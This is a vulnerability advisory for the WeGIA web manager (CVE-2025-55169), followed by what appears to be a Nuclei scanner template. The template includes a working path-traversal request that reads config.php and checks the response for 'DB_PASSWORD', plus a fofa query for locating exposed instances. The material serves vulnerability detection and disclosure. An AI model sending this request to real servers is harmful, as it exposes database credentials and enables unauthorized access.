WeGIA is an open source web manager with a focus on the Portuguese language and charitable institutions. Prior to version 3.4.8, a path traversal vulnerability was discovered in the WeGIA application, html/socio/sistema/download_remessa.php endpoint. This vulnerability could allow an attacker to gain unauthorized access to local files in the server and sensitive information stored in config.php. config.php contains information that could allow direct access to the database. This issue has been patched in version 3.4.8.
PoC代码[已公开]
id: CVE-2025-55169
info:
name: WeGIA - Directory Traversal
author: praivesi
severity: critical
description: |
WeGIA is an open source web manager with a focus on the Portuguese language and charitable institutions. Prior to version 3.4.8, a path traversal vulnerability was discovered in the WeGIA application, html/socio/sistema/download_remessa.php endpoint. This vulnerability could allow an attacker to gain unauthorized access to local files in the server and sensitive information stored in config.php. config.php contains information that could allow direct access to the database. This issue has been patched in version 3.4.8.
remediation: |
Upgrade to WeGIA version 3.4.8 or later, which patches the path traversal vulnerability.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2025-55169
- https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-mm3p-7573-4x4j
metadata:
verified: true
max-request: 1
fofa-query: title="WeGIA"
tags: cve,cve2025,wegia,lfi
http:
- raw:
- |
GET /html/socio/sistema/download_remessa.php?file=../../../www/html/wegia/config.php HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "DB_PASSWORD"
- type: word
part: content_type
words:
- "application/octet-stream"
- type: status
status:
- 200
# digest: 4a0a00473045022100f7923a815de20aa07720e66dff16d47f6e686a770fdfd644f972ba14aa787f740220068dfefeaf1633e5b72a5688e2d09158745af11818e93e7f2e1bfb13524e836a:922c64590222798bb761d5b6d8e72950